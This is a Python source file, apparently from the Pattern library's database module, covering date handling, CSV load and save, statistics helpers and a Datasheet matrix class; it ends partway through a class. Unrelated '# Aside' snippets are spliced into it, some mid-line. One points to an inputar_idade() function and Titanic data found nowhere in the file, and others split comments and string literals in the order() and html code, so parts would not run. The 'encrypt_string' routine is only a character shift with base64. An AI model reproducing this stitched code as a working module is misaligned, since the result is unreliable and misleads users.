http://www.clips.ua.ac.be/pages/pattern\n\n####################################################################################################\n\nimport os\nimport sys\nimport inspect\nimport re\nimport base64\nimport json\n\nimport csv as csvlib\n\nfrom codecs import BOM_UTF8\nfrom itertools import islice\nfrom datetime import datetime, timedelta\nfrom calendar import monthrange\nfrom time import mktime, strftime\nfrom math import sqrt\n\nfrom functools import cmp_to_key\n\nfrom io import open, StringIO, BytesIO\n\nBOM_UTF8 = BOM_UTF8.decode(\"utf-8\")\n\nfrom html.entities import name2codepoint\n\nfrom email.utils import parsedate_tz, mktime_tz\n\ntry:\n    MODULE = os.path.dirname(os.path.realpath(__file__))\nexcept:\n    MODULE = \"\"\n\nfrom pattern.helpers import encode_string, decode_string\n\ndecode_utf8 = decode_string\nencode_utf8 = encode_string\n\nALL = \"*\"\n\n_sum = sum # pattern.db.sum() is also a column aggregate function.\n\n#### DATE FUNCTIONS ################################################################################\n\nNOW, YEAR = \"now\", datetime.now().year\n\n# Date formats can be found in the 
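# Aside: inputar_idade() above hard-codes the per-class median ages (37/29/24).
# A sketch of a data-driven alternative with groupby/transform; it assumes a
# frame with 'Age' and 'Pclass' columns like the Titanic data used above.
import pandas as pd

def impute_age_by_class(df):
    """Fill missing ages with the median age of the passenger's class."""
    df = df.copy()
    df['Age'] = df.groupby('Pclass')['Age'].transform(lambda s: s.fillna(s.median()))
    return df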
Python documentation:\n# http://docs.python.org/library/time.html#time.strftime\nDEFAULT_DATE_FORMAT = \"%Y-%m-%d %H:%M:%S\"\ndate_formats = [\n    DEFAULT_DATE_FORMAT, # 2010-09-21 09:27:01 => SQLite + MySQL\n    \"%Y-%m-%dT%H:%M:%SZ\", # 2010-09-20T09:27:01Z => Bing\n    \"%a, %d %b %Y %H:%M:%S +0000\", # Fri, 21 Sep 2010 09:27:01 +0000 => Twitter\n    \"%a %b %d %H:%M:%S +0000 %Y\", # Fri Sep 21 09:21:01 +0000 2010 => Twitter\n    \"%Y-%m-%dT%H:%M:%S+0000\", # 2010-09-20T09:27:01+0000 => Facebook\n    \"%Y-%m-%d %H:%M\", # 2010-09-21 09:27\n    \"%Y-%m-%d\", # 2010-09-21\n    \"%d/%m/%Y\", # 21/09/2010\n    \"%d %B %Y\", # 21 September 2010\n    \"%d %b %Y\", # 21 Sep 2010\n    \"%B %d %Y\", # September 21 2010\n    \"%B %d, %Y\", # September 21, 2010\n]\n\n\ndef _yyyywwd2yyyymmdd(year, week, weekday):\n    \"\"\" Returns (year, month, day) for given (year, week, weekday).\n    \"\"\"\n    d = datetime(year, month=1, day=4) # 1st week contains January 4th.\n    d = d - timedelta(d.isoweekday() - 1) + timedelta(days=weekday - 1, weeks=week - 1)\n    return (d.year, d.month, d.day)\n\n\ndef _strftime1900(d, format):\n    \"\"\" Returns the given date formatted as a string.\n    \"\"\"\n    if d.year < 1900: # Python's strftime() doesn't handle year < 1900.\n        return strftime(format, (1900,) + d.timetuple()[1:]).replace(\"1900\", str(d.year), 1)\n    return datetime.strftime(d, format)\n\n\nclass DateError(Exception):\n    pass\n\n\nclass Date(datetime):\n    \"\"\" A convenience wrapper for datetime.datetime with a default string format.\n    \"\"\"\n    format = DEFAULT_DATE_FORMAT\n    # Date.year\n    # Date.month\n    # Date.day\n    # Date.minute\n    # Date.second\n\n    @property\n    def minutes(self):\n        return self.minute\n\n    @property\n    def seconds(self):\n        return self.second\n\n    @property\n    def microseconds(self):\n        return self.microsecond\n\n    @property\n    def week(self):\n        return self.isocalendar()[1]\n\n    @property\n    def weekday(self):\n        return self.isocalendar()[2]\n\n    @property\n    def timestamp(self):\n\n        # In Python 3, years before 1900 are accepted while mktime() raises ValueError in Python 2. 
Let's stick to this.\n if self.timetuple().tm_year < 1900:\n raise ValueError(\"year out of range\")\n\n return int(mktime(self.timetuple())) # Seconds elapsed since 1/1/1970.\n\n def strftime(self, format):\n return _strftime1900(self, format)\n\n def copy(self):\n return date(self.timestamp)\n\n def __str__(self):\n return self.strftime(self.format)\n\n def __repr__(self):\n return \"Date(%s)\" % repr(self.__str__())\n\n def __iadd__(self, t):\n return self.__add__(t)\n\n def __isub__(self, t):\n return self.__sub__(t)\n\n def __add__(self, t):\n d = self\n if getattr(t, \"years\", 0) \\\n or getattr(t, \"months\", 0):\n # January 31 + 1 month = February 28.\n y = (d.month + t.months - 1) // 12 + d.year + t.years\n m = (d.month + t.months + 0) % 12 or 12\n r = monthrange(y, m)\n d = date(y, m, min(d.day, r[1]), d.hour, d.minute, d.second, d.microsecond)\n d = datetime.__add__(d, t)\n return date(d.year, d.month, d.day, d.hour, d.minute, d.second, d.microsecond, self.format)\n\n def __sub__(self, t):\n if isinstance(t, (Date, datetime)):\n # Subtracting two dates returns a Time.\n t = datetime.__sub__(self, t)\n return Time(+t.days, +t.seconds,\n microseconds = +t.microseconds)\n if isinstance(t, (Time, timedelta)):\n return self + Time(-t.days, -t.seconds,\n microseconds = -t.microseconds,\n months = -getattr(t, \"months\", 0),\n years = -getattr(t, \"years\", 0))\n\n\ndef date(*args, **kwargs):\n \"\"\" Returns a Date from the given parameters:\n - date(format=Date.format) => now\n - date(int)\n - date(string)\n - date(string, format=Date.format)\n - date(string, inputformat, format=Date.format)\n - date(year, month, day, format=Date.format)\n - date(year, month, day, hours, minutes, seconds, format=Date.format)\n If a string is given without an explicit input format, all known formats will be tried.\n \"\"\"\n d = None\n f = None\n if len(args) == 0 \\\n and kwargs.get(\"year\") is not None \\\n and kwargs.get(\"month\") \\\n and kwargs.get(\"day\"):\n # Year, month, day.\n d = Date(**kwargs)\n elif kwargs.get(\"week\"):\n # Year, week, weekday.\n f = kwargs.pop(\"format\", None)\n d = Date(*_yyyywwd2yyyymmdd(\n kwargs.pop(\"year\", args and args[0] or Date.now().year),\n kwargs.pop(\"week\"),\n kwargs.pop(\"weekday\", kwargs.pop(\"day\", 1))), **kwargs)\n elif len(args) == 0 or args[0] == NOW:\n # No parameters or one parameter NOW.\n d = Date.now()\n elif len(args) == 1 \\\n and isinstance(args[0], (Date, datetime)):\n # One parameter, a Date or datetime object.\n d = Date.fromtimestamp(int(mktime(args[0].timetuple())))\n d += time(microseconds=args[0].microsecond)\n elif len(args) == 1 \\\n and (isinstance(args[0], int) \\\n or isinstance(args[0], (str, bytes)) and args[0].isdigit()):\n # One parameter, an int or string timestamp.\n if isinstance(args[0], bytes):\n args = (args[0].decode(\"utf-8\"),)\n d = Date.fromtimestamp(int(args[0]))\n elif len(args) == 1 \\\n and isinstance(args[0], (str, bytes)):\n # One parameter, a date string for which we guess the input format (RFC2822 or known formats).\n if isinstance(args[0], bytes):\n args = (args[0].decode(\"utf-8\"),)\n try:\n d = Date.fromtimestamp(mktime_tz(parsedate_tz(args[0])))\n except:\n for format in (\"format\" in kwargs and [kwargs[\"format\"]] or []) + date_formats:\n try:\n d = Date.strptime(args[0], format)\n break\n except:\n pass\n if d is None:\n raise DateError(\"unknown date format for %s\" % repr(args[0]))\n elif len(args) == 2 \\\n and isinstance(args[0], (str, bytes)):\n # Two parameters, a date string and an 
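# Aside: a self-contained check of the month-clamping rule in Date.__add__ above,
# where January 31 + 1 month lands on February 28. add_months() is an
# illustrative name, not part of pattern.db.
from calendar import monthrange
from datetime import datetime

def add_months(d, months):
    y = (d.month + months - 1) // 12 + d.year  # carry whole years
    m = (d.month + months) % 12 or 12          # month 0 wraps around to December
    day = min(d.day, monthrange(y, m)[1])      # clamp to the month's last day
    return datetime(y, m, day)

assert add_months(datetime(2010, 1, 31), 1) == datetime(2010, 2, 28)
assert add_months(datetime(2010, 12, 15), 1) == datetime(2011, 1, 15)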
explicit input format.\n if isinstance(args[0], bytes):\n args = (args[0].decode(\"utf-8\"), args[1].decode(\"utf-8\"))\n d = Date.strptime(args[0], args[1])\n elif len(args) >= 3:\n # 3-6 parameters: year, month, day, hours, minutes, seconds.\n f = kwargs.pop(\"format\", None)\n d = Date(*args[:7], **kwargs)\n else:\n raise DateError(\"unknown date format\")\n d.format = kwargs.get(\"format\") or len(args) > 7 and args[7] or f or Date.format\n return d\n\n\nclass Time(timedelta):\n\n def __new__(cls, *args, **kwargs):\n \"\"\" A convenience wrapper for datetime.timedelta that handles months and years.\n \"\"\"\n # Time.years\n # Time.months\n # Time.days\n # Time.seconds\n # Time.microseconds\n y = kwargs.pop(\"years\", 0)\n m = kwargs.pop(\"months\", 0)\n t = timedelta.__new__(cls, *args, **kwargs)\n setattr(t, \"years\", y)\n setattr(t, \"months\", m)\n return t\n\n\ndef time(days=0, seconds=0, minutes=0, hours=0, **kwargs):\n \"\"\" Returns a Time that can be added to a Date object.\n Other parameters: microseconds, milliseconds, weeks, months, years.\n \"\"\"\n return Time(days=days, seconds=seconds, minutes=minutes, hours=hours, **kwargs)\n\n\ndef string(value, default=\"\"):\n \"\"\" Returns the value cast to unicode, or default if it is None/empty.\n \"\"\"\n # Useful for HTML interfaces.\n if value is None or value == \"\": # Don't do value != None because this includes 0.\n return default\n return decode_utf8(value)\n\n\nclass EncryptionError(Exception):\n pass\n\n\nclass DecryptionError(Exception):\n pass\n\n\ndef encrypt_string(s, key=\"\"):\n \"\"\" Returns the given string as an encrypted bytestring.\n \"\"\"\n key += \" \"\n a = []\n for i in range(len(s)):\n try:\n a.append(chr(ord(s[i]) + ord(key[i % len(key)]) % 256).encode(\"latin-1\"))\n except:\n raise EncryptionError()\n s = b\"\".join(a)\n s = base64.urlsafe_b64encode(s)\n return s\n\n\ndef decrypt_string(s, key=\"\"):\n \"\"\" Returns the given string as a decrypted Unicode string.\n \"\"\"\n key += \" \"\n s = base64.urlsafe_b64decode(s)\n s = s.decode(\"latin-1\")\n a = []\n for i in range(len(s)):\n try:\n a.append(chr(ord(s[i]) - ord(key[i % len(key)]) % 256))\n except:\n raise DecryptionError()\n s = \"\".join(a)\n s = decode_utf8(s)\n return s\n\n\n#### LIST FUNCTIONS ################################################################################\n\n\ndef order(list, cmp=None, key=None, reverse=False):\n \"\"\" Returns a list of indices in the order as when the given list is sorted.\n For example: [\"c\",\"a\",\"b\"] => [1, 2, 0]\n This means that in the sorted list, \"a\" (index 1) comes first and \"c\" (index 0) last.\n \"\"\"\n if cmp and key:\n f = lambda i, j: cmp(key(list[i]), key(list[j]))\n elif cmp:\n f = lambda i, j: cmp(list[i], list[j])\n elif key:\n f = lambda i, j: int(key(list[i]) >= key(list[j])) * 2 - 1\n else:\n f = lambda i, j: int(list[i] >= list[j]) * 2 - 1\n return sorted(range(len(list)), key=cmp_to_key(f), reverse=reverse)\n\n_order = order\n\n\ndef avg(list):\n \"\"\" Returns the arithmetic mean of the given list of values.\n For example: mean([1,2,3,4]) = 10/4 = 2.5.\n \"\"\"\n return float(_sum(list)) / (len(list) or 1)\n\n\ndef variance(list):\n \"\"\" Returns the variance of the given list of values.\n The variance is the average of squared deviations from the mean.\n \"\"\"\n a = avg(list)\n return _sum([(x - a)**2 for x in list]) / (len(list) - 1 or 1)\n\n\ndef stdev(list):\n \"\"\" Returns the standard deviation of the given list of values.\n Low standard deviation => values 
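# Aside: order() above returns the argsort of a list, i.e. the indices that put
# it in sorted order. A pure-Python equivalent (without the cmp/key plumbing)
# reproducing the docstring's own example; argsort() is an illustrative name.
def argsort(values):
    return sorted(range(len(values)), key=values.__getitem__)

assert argsort(["c", "a", "b"]) == [1, 2, 0]  # "a" (index 1) first, "c" (index 0) last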
are close to the mean.\n High standard deviation => values are spread out over a large range.\n \"\"\"\n return sqrt(variance(list))\n\n#### FIELD #########################################################################################\n\n\nclass _String(str):\n # The STRING constant can be called with a length when passed to field(),\n # for example field(\"language\", type=STRING(2), default=\"en\", index=True).\n def __new__(self):\n return str.__new__(self, \"string\")\n\n def __call__(self, length=100):\n return \"varchar(%s)\" % (length > 255 and 255 or (length < 1 and 1 or length))\n\n# Field type.\n# Note: SQLite string fields do not impose a string limit.\n# Unicode strings have more characters than actually displayed (e.g. \"♥\").\n# Boolean fields are stored as tinyint(1), int 0 or 1.\nSTRING, INTEGER, FLOAT, TEXT, BLOB, BOOLEAN, DATE = \\\n _String(), \"integer\", \"float\", \"text\", \"blob\", \"boolean\", \"date\"\n\nSTR, INT, BOOL = STRING, INTEGER, BOOLEAN\n\n\n#--- QUERY -----------------------------------------------------------------------------------------\n\n\n\n# Sorting:\nASCENDING = \"asc\"\nDESCENDING = \"desc\"\n\n# Grouping:\nFIRST, LAST, COUNT, MAX, MIN, SUM, AVG, STDEV, CONCATENATE = \\\n \"first\", \"last\", \"count\", \"max\", \"min\", \"sum\", \"avg\", \"stdev\", \"group_concat\"\n\n\n#### DATASHEET #####################################################################################\n\n#--- CSV -------------------------------------------------------------------------------------------\n\n# Raise the default field size limit:\nif sys.platform == 'win32':\n csvlib.field_size_limit(min(sys.maxsize, 2147483647))\nelse:\n csvlib.field_size_limit(sys.maxsize)\n\n\ndef csv_header_encode(field, type=STRING):\n # csv_header_encode(\"age\", INTEGER) => \"age (INTEGER)\".\n t = re.sub(r\"^varchar\\(.*?\\)\", \"string\", (type or \"\"))\n t = t and \" (%s)\" % t or \"\"\n s = \"%s%s\" % (field or \"\", t.upper())\n return s\n\n\ndef csv_header_decode(s):\n # csv_header_decode(\"age (INTEGER)\") => (\"age\", INTEGER).\n p = r\"STRING|INTEGER|FLOAT|TEXT|BLOB|BOOLEAN|DATE|\"\n p = re.match(r\"(.*?) 
\\((\" + p + r\")\\)\", s)\n s = s.endswith(\" ()\") and s[:-3] or s\n return p and (string(p.group(1), default=None), p.group(2).lower()) or (string(s) or None, None)\n\n\nclass CSV(list):\n\n def __new__(cls, rows=[], fields=None, **kwargs):\n \"\"\" A list of lists that can be imported and exported as a comma-separated text file (CSV).\n \"\"\"\n if isinstance(rows, str) and os.path.exists(rows):\n csv = cls.load(rows, **kwargs)\n else:\n csv = list.__new__(cls)\n return csv\n\n def __init__(self, rows=[], fields=None, **kwargs):\n # List of (name, type)-tuples (STRING, INTEGER, FLOAT, DATE, BOOLEAN).\n fields = fields or kwargs.pop(\"headers\", None)\n fields = fields and [tuple(f) if isinstance(f, (tuple, list)) else (f, None) for f in fields] or None\n self.__dict__[\"fields\"] = fields\n if hasattr(rows, \"__iter__\"):\n self.extend(rows, **kwargs)\n\n def extend(self, rows, **kwargs):\n list.extend(self, rows)\n\n def _set_headers(self, v):\n self.__dict__[\"fields\"] = v\n\n def _get_headers(self):\n return self.__dict__[\"fields\"]\n\n headers = property(_get_headers, _set_headers)\n\n def save(self, path, separator=\",\", encoder=lambda v: v, headers=False, password=None, **kwargs):\n \"\"\" Exports the table to a unicode text file at the given path.\n Rows in the file are separated with a newline.\n Columns in a row are separated with the given separator (by default, comma).\n For data types other than string, int, float, bool or None, a custom string encoder can be given.\n \"\"\"\n # Optional parameters include all arguments for csv.writer(), see:\n # http://docs.python.org/library/csv.html#csv.writer\n kwargs.setdefault(\"delimiter\", separator)\n kwargs.setdefault(\"quoting\", csvlib.QUOTE_ALL)\n # csv.writer will handle str, int, float and bool:\n s = StringIO()\n w = csvlib.writer(s, **kwargs)\n if headers and self.fields is not None:\n w.writerows([[csv_header_encode(name, type) for name, type in self.fields]])\n w.writerows([[encoder(v) for v in row] for row in self])\n s = s.getvalue()\n s = s.strip()\n s = re.sub(\"([^\\\"]|^)\\\"None\\\"\", \"\\\\1None\", s)\n s = s if not password else encrypt_string(s, password)\n f = open(path, \"w\", encoding=\"utf-8\")\n f.write(BOM_UTF8)\n f.write(s)\n f.close()\n\n @classmethod\n def load(cls, path, separator=\",\", decoder=lambda v: v, headers=False, preprocess=None, password=None, **kwargs):\n \"\"\" Returns a table from the data in the given text file.\n Rows are expected to be separated by a newline.\n Columns are expected to be separated by the given separator (by default, comma).\n Strings will be converted to int, float, bool, date or None if headers are parsed.\n For other data types, a custom string decoder can be given.\n A preprocess(str) function can be given to change the file content before parsing.\n \"\"\"\n # Date objects are saved and loaded as strings, but it is easy to convert these back to dates:\n # - set a DATE field type for the column,\n # - or do Table.columns[x].map(lambda s: date(s))\n f = open(path, \"r\", encoding=\"utf-8\")\n\n data = f if not password else decrypt_string(f.read(), password)\n data.seek(data.readline().startswith(BOM_UTF8) and 3 or 0)\n data = data if not password else BytesIO(data.replace(\"\\r\\n\", \"\\n\").replace(\"\\r\", \"\\n\"))\n data = data if not preprocess else BytesIO(preprocess(data.read()))\n data = csvlib.reader(data, delimiter=separator)\n\n i, n = kwargs.get(\"start\"), kwargs.get(\"count\")\n if i is not None and n is not None:\n data = list(islice(data, i, i + 
n))\n elif i is not None:\n data = list(islice(data, i, None))\n elif n is not None:\n data = list(islice(data, n))\n else:\n data = list(data)\n\n f.close()\n del f\n\n if headers:\n fields = [csv_header_decode(field) for field in data.pop(0)]\n fields += [(None, None)] * (max([0] + [len(row) for row in data]) - len(fields))\n else:\n fields = []\n if not fields:\n # Cast fields using the given decoder (by default, all strings + None).\n data = [[decoder(decode_utf8(v) if v != \"None\" else None) for v in row] for row in data]\n else:\n # Cast fields to their defined field type (STRING, INTEGER, ...)\n for i, row in enumerate(data):\n for j, v in enumerate(row):\n type = fields[j][1]\n if row[j] == \"None\":\n row[j] = decoder(None)\n elif type is None:\n row[j] = decoder(decode_utf8(v))\n elif type in (STRING, TEXT):\n row[j] = decode_utf8(v)\n elif type == INTEGER:\n row[j] = int(row[j])\n elif type == FLOAT:\n row[j] = float(row[j])\n elif type == BOOLEAN:\n row[j] = bool(row[j])\n elif type == DATE:\n row[j] = date(row[j])\n elif type == BLOB:\n row[j] = v\n else:\n row[j] = decoder(decode_utf8(v))\n return cls(rows=data, fields=fields, **kwargs)\n\n#--- DATASHEET -------------------------------------------------------------------------------------\n\n\nclass Datasheet(CSV):\n\n def __init__(self, rows=[], fields=None, **kwargs):\n \"\"\" A matrix of rows and columns, where each row and column can be retrieved as a list.\n Values can be any kind of Python object.\n \"\"\"\n # NumPy array, convert to list of int/float/str/bool.\n if rows.__class__.__name__ == \"ndarray\":\n rows = rows.tolist()\n self.__dict__[\"_rows\"] = DatasheetRows(self)\n self.__dict__[\"_columns\"] = DatasheetColumns(self)\n self.__dict__[\"_m\"] = 0 # Number of columns per row, see Datasheet.insert().\n list.__init__(self)\n CSV.__init__(self, rows, fields, **kwargs)\n\n def _get_rows(self):\n return self._rows\n\n def _set_rows(self, rows):\n # Datasheet.rows property can't be set, except in special case Datasheet.rows += row.\n if isinstance(rows, DatasheetRows) and rows._datasheet == self:\n self._rows = rows\n return\n raise AttributeError(\"can't set attribute\")\n rows = property(_get_rows, _set_rows)\n\n def _get_columns(self):\n return self._columns\n\n def _set_columns(self, columns):\n # Datasheet.columns property can't be set, except in special case Datasheet.columns += column.\n if isinstance(columns, DatasheetColumns) and columns._datasheet == self:\n self._columns = columns\n return\n raise AttributeError(\"can't set attribute\")\n columns = cols = property(_get_columns, _set_columns)\n\n def __getattr__(self, k):\n \"\"\" Columns can be retrieved by field name, e.g., Datasheet.date.\n \"\"\"\n #print(\"Datasheet.__getattr__\", k)\n if k in self.__dict__:\n return self.__dict__[k]\n for i, f in enumerate(f[0] for f in self.__dict__[\"fields\"] or []):\n if f == k:\n return self.__dict__[\"_columns\"][i]\n raise AttributeError(\"'Datasheet' object has no attribute '%s'\" % k)\n\n def __setattr__(self, k, v):\n \"\"\" Columns can be set by field name, e.g., Datasheet.date = [...].\n \"\"\"\n #print(\"Datasheet.__setattr__\", k)\n if k in self.__dict__:\n self.__dict__[k] = v\n return\n if k == \"rows\":\n self._set_rows(v)\n return\n if k == \"columns\":\n self._set_columns(v)\n return\n if k == \"headers\":\n self._set_headers(v)\n return\n for i, f in enumerate(f[0] for f in self.__dict__[\"fields\"] or []):\n if f == k:\n self.__dict__[\"_columns\"].__setitem__(i, v)\n return\n raise 
AttributeError(\"'Datasheet' object has no attribute '%s'\" % k)\n\n def __setitem__(self, index, value):\n \"\"\" Sets an item or row in the matrix.\n For Datasheet[i] = v, sets the row at index i to v.\n For Datasheet[i,j] = v, sets the value in row i and column j to v.\n \"\"\"\n if isinstance(index, tuple):\n list.__getitem__(self, index[0])[index[1]] = value\n elif isinstance(index, int):\n self.pop(index)\n self.insert(index, value)\n else:\n raise TypeError(\"Datasheet indices must be int or tuple\")\n\n def __getitem__(self, index):\n \"\"\" Returns an item, row or slice from the matrix.\n For Datasheet[i], returns the row at the given index.\n For Datasheet[i,j], returns the value in row i and column j.\n \"\"\"\n if isinstance(index, int):\n # Datasheet[i] => row i.\n return list.__getitem__(self, index)\n elif isinstance(index, slice):\n return Datasheet(rows = list.__getitem__(self, index), fields = self.fields)\n elif isinstance(index, tuple):\n i, j = index\n # Datasheet[i,j] => item from column j in row i.\n # Datasheet[i,j1:j2] => columns j1-j2 from row i.\n if not isinstance(i, slice):\n return list.__getitem__(self, i)[j]\n # Datasheet[i1:i2,j] => column j from rows i1-i2.\n if not isinstance(j, slice):\n return [row[j] for row in list.__getitem__(self, i)]\n # Datasheet[i1:i2,j1:j2] => Datasheet with columns j1-j2 from rows i1-i2.\n return Datasheet(\n rows = (row[j] for row in list.__getitem__(self, i)),\n fields = self.fields and self.fields[j] or self.fields)\n raise TypeError(\"Datasheet indices must be int, tuple or slice\")\n\n # Python 2 (backward compatibility)\n __getslice__ = lambda self, i, j: self.__getitem__(slice(i, j))\n\n def __delitem__(self, index):\n self.pop(index)\n\n # datasheet1 = datasheet2 + datasheet3\n # datasheet1 = [[...],[...]] + datasheet2\n # datasheet1 += datasheet2\n def __add__(self, datasheet):\n m = self.copy()\n m.extend(datasheet)\n return m\n\n def __radd__(self, datasheet):\n m = Datasheet(datasheet)\n m.extend(self)\n return m\n\n def __iadd__(self, datasheet):\n self.extend(datasheet)\n return self\n\n def insert(self, i, row, default=None, **kwargs):\n \"\"\" Inserts the given row into the matrix.\n Missing columns at the end (right) will be filled with the default value.\n \"\"\"\n try:\n # Copy the row (fast + safe for generators and DatasheetColumns).\n row = [v for v in row]\n except:\n raise TypeError(\"Datasheet.insert(x): x must be list\")\n list.insert(self, i, row)\n m = max((len(self) > 1 and self._m or 0, len(row)))\n if len(row) < m:\n row.extend([default] * (m - len(row)))\n if self._m < m:\n # The given row might have more columns than the rows in the matrix.\n # Performance takes a hit when these rows have to be expanded:\n for row in self:\n if len(row) < m:\n row.extend([default] * (m - len(row)))\n self.__dict__[\"_m\"] = m\n\n def append(self, row, default=None, _m=None, **kwargs):\n self.insert(len(self), row, default)\n\n def extend(self, rows, default=None, **kwargs):\n for row in rows:\n self.insert(len(self), row, default)\n\n def group(self, j, function=FIRST, key=lambda v: v):\n \"\"\" Returns a datasheet with unique values in column j by grouping rows with the given function.\n The function takes a list of column values as input and returns a single value,\n e.g. 
FIRST, LAST, COUNT, MAX, MIN, SUM, AVG, STDEV, CONCATENATE.\n The function can also be a list of functions (one for each column).\n TypeError will be raised when the function cannot handle the data in a column.\n The key argument can be used to map the values in column j, for example:\n key=lambda date: date.year to group Date objects by year.\n \"\"\"\n if isinstance(function, tuple):\n function = list(function)\n if not isinstance(function, list):\n function = [function] * self._m\n if len(function) < self._m:\n function += [FIRST] * (self._m - len(function))\n for i, f in enumerate(function):\n if i == j: # Group column j is always FIRST.\n f = FIRST\n if f == FIRST:\n function[i] = lambda a: a[+0]\n if f == LAST:\n function[i] = lambda a: a[-1]\n if f == COUNT:\n function[i] = lambda a: len(a)\n if f == MAX:\n function[i] = lambda a: max(a)\n if f == MIN:\n function[i] = lambda a: min(a)\n if f == SUM:\n function[i] = lambda a: _sum([x for x in a if x is not None])\n if f == AVG:\n function[i] = lambda a: avg([x for x in a if x is not None])\n if f == STDEV:\n function[i] = lambda a: stdev([x for x in a if x is not None])\n if f == CONCATENATE:\n function[i] = lambda a: \",\".join(decode_utf8(x) for x in a if x is not None)\n J = j\n # Map unique values in column j to a list of rows that contain this value.\n g = {}\n [g.setdefault(key(v), []).append(i) for i, v in enumerate(self.columns[j])]\n # Map unique values in column j to a sort index in the new, grouped list.\n o = [(g[v][0], v) for v in g]\n o = dict([(v, i) for i, (ii, v) in enumerate(sorted(o))])\n # Create a list of rows with unique values in column j,\n # applying the group function to the other columns.\n u = [None] * len(o)\n for v in g:\n # List the column values for each group row.\n u[o[v]] = [[list.__getitem__(self, i)[j] for i in g[v]] for j in range(self._m)]\n # Apply the group function to each row, except the unique value in column j.\n u[o[v]] = [function[j](column) for j, column in enumerate(u[o[v]])]\n u[o[v]][J] = v # list.__getitem__(self, i)[J]\n return Datasheet(rows=u)\n\n def record(self, row):\n \"\"\" Returns the given row as a dictionary of (field or alias, value)-items.\n \"\"\"\n return dict(list(zip((f for f, type in self.fields), row)))\n\n def map(self, function=lambda item: item):\n \"\"\" Applies the given function to each item in the matrix.\n \"\"\"\n for i, row in enumerate(self):\n for j, item in enumerate(row):\n row[j] = function(item)\n\n def slice(self, i, j, n, m):\n \"\"\" Returns a new Datasheet starting at row i and column j and spanning n rows and m columns.\n \"\"\"\n return Datasheet(rows=[list.__getitem__(self, i)[j:j + m] for i in range(i, i + n)])\n\n def copy(self, rows=ALL, columns=ALL):\n \"\"\" Returns a new Datasheet from a selective list of row and/or column indices.\n \"\"\"\n if rows == ALL and columns == ALL:\n return Datasheet(rows=self)\n if rows == ALL:\n return Datasheet(rows=list(zip(*(self.columns[j] for j in columns))))\n if columns == ALL:\n return Datasheet(rows=(self.rows[i] for i in rows))\n z = list(zip(*(self.columns[j] for j in columns)))\n return Datasheet(rows=(z[i] for i in rows))\n\n @property\n def array(self):\n \"\"\" Returns a NumPy array.\n Arrays must have elements of the same type, and rows of equal size.\n \"\"\"\n import numpy\n return numpy.array(self)\n\n @property\n def json(self, **kwargs):\n \"\"\" Returns a JSON-string, as a list of dictionaries (if fields are defined) or as a list of lists.\n This is useful for sending a Datasheet to 
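# Aside: Datasheet.group() above collapses rows sharing a value in column j and
# folds the other columns with an aggregate such as SUM. The same idea in plain
# Python with a dict; group_sum() is an illustrative name, not part of the module.
def group_sum(rows, j=0, k=1):
    totals = {}
    for row in rows:
        totals[row[j]] = totals.get(row[j], 0) + row[k]
    return sorted([key, total] for key, total in totals.items())

assert group_sum([["a", 1], ["b", 2], ["a", 3]]) == [["a", 4], ["b", 2]]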
JavaScript, for example.\n        \"\"\"\n        kwargs.setdefault(\"ensure_ascii\", False) # Disable simplejson's Unicode encoder.\n        if self.fields is not None:\n            s = json.dumps([dict((f[0], row[i]) for i, f in enumerate(self.fields)) for row in self], **kwargs)\n        else:\n            s = json.dumps(self, **kwargs)\n        return decode_utf8(s)\n\n    @property\n    def html(self):\n        \"\"\" Returns a HTML-string with a <table>.\n            This is useful for viewing the data, e.g., open(\"data.html\", \"wb\").write(datasheet.html).\n        \"\"\"\n        def encode(s):\n            s = \"%s\" % s\n            s = s.replace(\"&\", \"&amp;\")\n            s = s.replace(\"<\", \"&lt;\")\n            s = s.replace(\">\", \"&gt;\")\n            s = s.replace(\"-\", \"&#8209;\")\n            s = s.replace(\"\\n\", \"<br>\\n\")\n            return s\n        a = []\n        a.append(\"\\n\")\n        a.append(\"\\n\")\n        a.append(\"<table>\\n\")\n        if self.fields is not None:\n            a.append(\"<tr>\\n\")\n            a.append(\"\\t<th>%s</th>\\n\" % \"#\")\n            a.extend(\"\\t<th>%s</th>\\n\" % encode(f[0]) for f in self.fields)\n            a.append(\"</tr>\\n\")\n        for i, row in enumerate(self):\n            a.append(\"<tr>\\n\")\n            a.append(\"\\t<td>%s</td>\\n\" % (i + 1))\n            a.extend(\"\\t<td>%s</td>\\n\" % encode(v) for v in row)\n            a.append(\"</tr>\\n\")\n        a.append(\"</table>
    \")\n return encode_utf8(\"\".join(a))\n\n\ndef flip(datasheet):\n \"\"\" Returns a new datasheet with rows for columns and columns for rows.\n \"\"\"\n return Datasheet(rows=datasheet.columns)\n\n\ndef csv(*args, **kwargs):\n \"\"\" Returns a Datasheet from the given CSV file path.\n \"\"\"\n if len(args) == 0:\n return Datasheet(**kwargs)\n return Datasheet.load(*args, **kwargs)\n\n#--- DATASHEET ROWS --------------------------------------------------------------------------------\n# Datasheet.rows mimics the operations on Datasheet:\n\n\nclass DatasheetRows(list):\n\n def __init__(self, datasheet):\n self._datasheet = datasheet\n\n def __setitem__(self, i, row):\n self._datasheet.pop(i)\n self._datasheet.insert(i, row)\n\n def __getitem__(self, i):\n return list.__getitem__(self._datasheet, i)\n\n def __getslice__(self, i, j):\n return self._datasheet[i:j]\n\n def __delitem__(self, i):\n self.pop(i)\n\n def __len__(self):\n return len(self._datasheet)\n\n def __iter__(self):\n for i in range(len(self)):\n yield list.__getitem__(self._datasheet, i)\n\n def __repr__(self):\n return repr(self._datasheet)\n\n def __add__(self, row):\n raise TypeError(\"unsupported operand type(s) for +: 'Datasheet.rows' and '%s'\" % row.__class__.__name__)\n\n def __iadd__(self, row):\n self.append(row)\n return self\n\n def __eq__(self, rows):\n return self._datasheet.__eq__(rows)\n\n def __ne__(self, rows):\n return self._datasheet.__ne__(rows)\n\n def insert(self, i, row, default=None):\n self._datasheet.insert(i, row, default)\n\n def append(self, row, default=None):\n self._datasheet.append(row, default)\n\n def extend(self, rows, default=None):\n self._datasheet.extend(rows, default)\n\n def remove(self, row):\n self._datasheet.remove(row)\n\n def pop(self, i):\n return self._datasheet.pop(i)\n\n def count(self, row):\n return self._datasheet.count(row)\n\n def index(self, row):\n return self._datasheet.index(row)\n\n def sort(self, cmp=None, key=None, reverse=False):\n self._datasheet.sort(cmp, key, reverse)\n\n def reverse(self):\n self._datasheet.reverse()\n\n def swap(self, i1, i2):\n self[i1], self[i2] = self[i2], self[i1]\n\n#--- DATASHEET COLUMNS -----------------------------------------------------------------------------\n\n\nclass DatasheetColumns(list):\n\n def __init__(self, datasheet):\n self._datasheet = datasheet\n self._cache = {} # Keep a reference to DatasheetColumn objects generated with Datasheet.columns[j].\n # This way we can unlink them when they are deleted.\n\n def 